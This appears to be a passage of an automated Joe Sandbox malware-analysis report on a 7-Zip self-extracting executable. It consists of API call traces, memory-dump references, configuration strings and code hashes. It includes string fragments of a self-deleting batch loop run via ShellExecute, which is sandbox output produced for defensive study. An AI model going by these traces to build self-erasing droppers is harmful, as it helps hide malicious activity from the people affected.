                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403E6B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403E73
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403E7B
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403E81
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403E89
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                                                                        • String ID: .lnk$[@
                                                                                                                                        • API String ID: 408529070-3575931549
                                                                                                                                        • Opcode ID: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
                                                                                                                                        • Instruction ID: 946a9f5c9c0093345211e4afafb7f9b8cfdd3f629f77b347e180bd11e348c725
                                                                                                                                        • Opcode Fuzzy Hash: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
                                                                                                                                        • Instruction Fuzzy Hash: 57A16E75810108ABCF15EFA1CC969EEBB7DFF19306F50442AF402B61A1EB399E41CB58
                                                                                                                                        APIs
                                                                                                                                        • _wtol.MSVCRT ref: 004050E7
                                                                                                                                        • _wtol.MSVCRT ref: 00405103
                                                                                                                                        • lstrcmpiW.KERNEL32(00000000,0041B810,?,?,?,?,?,?,?,?,?,?,?,?,?,004062C4), ref: 00404FEA
                                                                                                                                          • Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                                                                                          • Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
                                                                                                                                          • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                                                                                          • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
                                                                                                                                          • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                                                                                          • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                                                                                          • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
                                                                                                                                          • Part of subcall function 0040247D: lstrcmpiW.KERNEL32(00AA90C0,?), ref: 00402541
                                                                                                                                          • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(00AA90C0), ref: 00402551
                                                                                                                                          • Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
                                                                                                                                          • Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                                                                                          • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                                                                                          • Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                                                                                        • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$WarningTitle
                                                                                                                                        • API String ID: 2725485552-2157245290
                                                                                                                                        • Opcode ID: d0ccb95079a2c606f9a3c0ce682cef1d136eaf38159f665c4b074d3e10087a1f
                                                                                                                                        • Instruction ID: 66a2ce9ff7a2cb702224bd8f74ea761d5872454bbbc4643ec2785d60350ddd68
                                                                                                                                        • Opcode Fuzzy Hash: d0ccb95079a2c606f9a3c0ce682cef1d136eaf38159f665c4b074d3e10087a1f
                                                                                                                                        • Instruction Fuzzy Hash: AC51D8F1E016007ADA216B275D4ADAF366CEB85704B28443BFD04F22D6E77C4A4046EF
                                                                                                                                        APIs
                                                                                                                                        • GetDriveTypeW.KERNEL32(?,?,?), ref: 004057DA
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040580B
                                                                                                                                        • WriteFile.KERNEL32(0041EA30,?,?,00407468,00000000,del ",:Repeat,00000000), ref: 004058C0
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 004058CB
                                                                                                                                        • CloseHandle.KERNEL32(0041EA30), ref: 004058D4
                                                                                                                                        • SetFileAttributesW.KERNEL32(00407468,00000000), ref: 004058EB
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004058FD
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405906
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405912
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00407468,?), ref: 00405918
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00407468,?,?,?,?,?,?,?,?,?,?,?,?,?,00407468,0041EA30), ref: 00405946
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                                                                        • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                                                                        • API String ID: 3007203151-3467708659
                                                                                                                                        • Opcode ID: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
                                                                                                                                        • Instruction ID: eb7ea14b5f0693ba8c6a98bcb421c9bec9bd01f197c59b95adb21b6866ed8523
                                                                                                                                        • Opcode Fuzzy Hash: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
                                                                                                                                        • Instruction Fuzzy Hash: DE413871800108AEDB11ABA5EC86DEF7B7DEF04724F50843AF511721E1EB795E85CB98
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameA.USER32(?,?,00000040), ref: 00403436
                                                                                                                                        • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403449
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00403456
                                                                                                                                          • Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                                                                                          • Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403483
                                                                                                                                        • GetParent.USER32(?), ref: 00403491
                                                                                                                                        • LoadLibraryA.KERNEL32(riched20), ref: 004034A5
                                                                                                                                        • GetMenu.USER32(?), ref: 004034B8
                                                                                                                                        • SetThreadLocale.KERNEL32(00000419), ref: 004034C5
                                                                                                                                        • CreateWindowExW.USER32(00000000,RichEdit20W,0041A584,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004034F5
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00403506
                                                                                                                                        • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 0040351B
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0040351F
                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0040352D
                                                                                                                                        • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403558
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040355D
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403565
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                                                                        • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                                                                        • API String ID: 3514532227-2281146334
                                                                                                                                        • Opcode ID: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
                                                                                                                                        • Instruction ID: e5fea360a7eb9894b086cd4675cd9c6500acd79176ce5b6afcc660833785d9d0
                                                                                                                                        • Opcode Fuzzy Hash: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
                                                                                                                                        • Instruction Fuzzy Hash: 67317F72901109BFDB01AFA5DC49EEF7BBCEB08705F10407AF604F6190DA799E518B6A
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                                                                                        • LoadIconW.USER32(00000000), ref: 00408EA2
                                                                                                                                        • GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                                                                                        • LoadImageW.USER32(00000000), ref: 00408EC7
                                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                                                                                        • GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                                                                                        • GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                                                                                        • GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                                                                                        • GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 0040904E
                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 0040906A
                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 00409082
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00409240), ref: 004090E2
                                                                                                                                        • LoadIconW.USER32(00000000), ref: 004090E9
                                                                                                                                        • GetDlgItem.USER32(?,000004B1), ref: 00409108
                                                                                                                                        • SendMessageW.USER32(00000000), ref: 0040910B
                                                                                                                                          • Part of subcall function 00408270: GetDlgItem.USER32(?,?), ref: 0040827A
                                                                                                                                          • Part of subcall function 00408270: GetWindowTextLengthW.USER32(00000000), ref: 00408281
                                                                                                                                          • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                          • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3694754696-0
                                                                                                                                        • Opcode ID: e6b773451116d13ff29ab79287a6f607863c90a398c86fb93464d41f8a12962b
                                                                                                                                        • Instruction ID: 99f397414dc97442f2ad5b2e660166812613d2f2543b201c56f9d92a48738ce2
                                                                                                                                        • Opcode Fuzzy Hash: e6b773451116d13ff29ab79287a6f607863c90a398c86fb93464d41f8a12962b
                                                                                                                                        • Instruction Fuzzy Hash: B971E6703047056BEA216B21DD4AF2B3659EF84714F10443EF652BA2E3CFBDAC018A5E
                                                                                                                                        APIs
                                                                                                                                        • GetWindowDC.USER32(00000000), ref: 004021B4
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
                                                                                                                                        • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
                                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00402208
                                                                                                                                        • MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
                                                                                                                                        • MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0040222B
                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00402232
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00402240
                                                                                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00402256
                                                                                                                                        • SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
                                                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
                                                                                                                                        • GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00402293
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00402299
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 004022A2
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 004022A5
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 004022AC
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 004022BB
                                                                                                                                        • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 004022C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3462224810-0
                                                                                                                                        • Opcode ID: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
                                                                                                                                        • Instruction ID: 3b0073103a1e3377af01ca77c53c0656b208625dbf3d379900f4631a354f9c66
                                                                                                                                        • Opcode Fuzzy Hash: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
                                                                                                                                        • Instruction Fuzzy Hash: DB314A76D01208BFDF115FE19D48EEF7F79EB48760F108066FA04B61A0C6794A60EB66
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameA.USER32(?,?,00000040), ref: 004022E5
                                                                                                                                        • lstrcmpiA.KERNEL32(?,STATIC), ref: 004022FC
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0040230F
                                                                                                                                        • GetMenu.USER32(?), ref: 00402324
                                                                                                                                          • Part of subcall function 004020BF: GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
                                                                                                                                          • Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
                                                                                                                                          • Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
                                                                                                                                          • Part of subcall function 004020BF: SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
                                                                                                                                          • Part of subcall function 004020BF: LoadResource.KERNEL32(00000000,00000000), ref: 00402116
                                                                                                                                          • Part of subcall function 004020BF: LockResource.KERNEL32(00000000), ref: 00402121
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402356
                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00402363
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0040236C
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402378
                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0041C434,?), ref: 0040239D
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004023AD
                                                                                                                                          • Part of subcall function 004021A8: GetWindowDC.USER32(00000000), ref: 004021B4
                                                                                                                                          • Part of subcall function 004021A8: GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
                                                                                                                                          • Part of subcall function 004021A8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
                                                                                                                                          • Part of subcall function 004021A8: GetObjectW.GDI32(?,00000018,?), ref: 00402208
                                                                                                                                          • Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
                                                                                                                                          • Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
                                                                                                                                          • Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 0040222B
                                                                                                                                          • Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 00402232
                                                                                                                                          • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402240
                                                                                                                                          • Part of subcall function 004021A8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
                                                                                                                                          • Part of subcall function 004021A8: SelectObject.GDI32(00000000,00000000), ref: 00402256
                                                                                                                                          • Part of subcall function 004021A8: SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
                                                                                                                                          • Part of subcall function 004021A8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
                                                                                                                                          • Part of subcall function 004021A8: GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
                                                                                                                                          • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402293
                                                                                                                                          • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402299
                                                                                                                                          • Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A2
                                                                                                                                          • Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A5
                                                                                                                                          • Part of subcall function 004021A8: ReleaseDC.USER32(00000000,?), ref: 004022AC
                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004023DF
                                                                                                                                        • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004023F3
                                                                                                                                        • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00402405
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040241A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                                                                        • String ID: IMAGES$STATIC
                                                                                                                                        • API String ID: 4202116410-1168396491
                                                                                                                                        • Opcode ID: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
                                                                                                                                        • Instruction ID: 12319829fe5b29bb351e3d23e86017266b1b8e93f03e65421de7465a1357d20e
                                                                                                                                        • Opcode Fuzzy Hash: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
                                                                                                                                        • Instruction Fuzzy Hash: 54419A31901218BFCB129FA1CC4CDEEBFB9FF09715B008076F905A62A0D7798A51DB69
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000004B3), ref: 00407A80
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00407A85
                                                                                                                                        • GetDlgItem.USER32(?,000004B4), ref: 00407ABC
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00407AC1
                                                                                                                                        • GetSystemMetrics.USER32(00000010), ref: 00407B43
                                                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 00407B49
                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00407B50
                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00407B57
                                                                                                                                        • GetParent.USER32(?), ref: 00407B7B
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00407B8D
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00407BA0
                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407C06
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00407CA0
                                                                                                                                          • Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A47
                                                                                                                                          • Part of subcall function 00407A29: SetWindowPos.USER32(00000000), ref: 00407A4E
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00407BA9
                                                                                                                                          • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00407D25
                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00407D2C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 747815384-0
                                                                                                                                        • Opcode ID: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
                                                                                                                                        • Instruction ID: 68cc850d19f91a6f8b6e213b01393e3a0b6efc74fec8c50de4b66a5980513343
                                                                                                                                        • Opcode Fuzzy Hash: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
                                                                                                                                        • Instruction Fuzzy Hash: 30A13870E04209AFDB14DFBDCD85AAEBBF9EF48704F14452AE605F2281D678F9018B65
                                                                                                                                        APIs
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,0041E3F0,00000000), ref: 0040377F
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,0041E3F0,00000000), ref: 00403787
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00404A6A,?), ref: 004039AD
                                                                                                                                          • Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT(?,?,00405791,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 00402996
                                                                                                                                          • Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT(?,?,?,00405791,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 0040299D
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00404A6A,?,?,00000000,00000000,0041E3F0,00000000), ref: 004039DA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@
                                                                                                                                        • String ID: SetEnvironment${\rtf
                                                                                                                                        • API String ID: 613200358-318139784
                                                                                                                                        • Opcode ID: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
                                                                                                                                        • Instruction ID: 401acfcb82d7e6738f93d8480f5cee0d093a2887585a601c22b507f4e5910529
                                                                                                                                        • Opcode Fuzzy Hash: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
                                                                                                                                        • Instruction Fuzzy Hash: B991C372900108ABDF11AFD5D941AEEBBB8AF14309F2480BBE841772D2D7785B06DB59
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
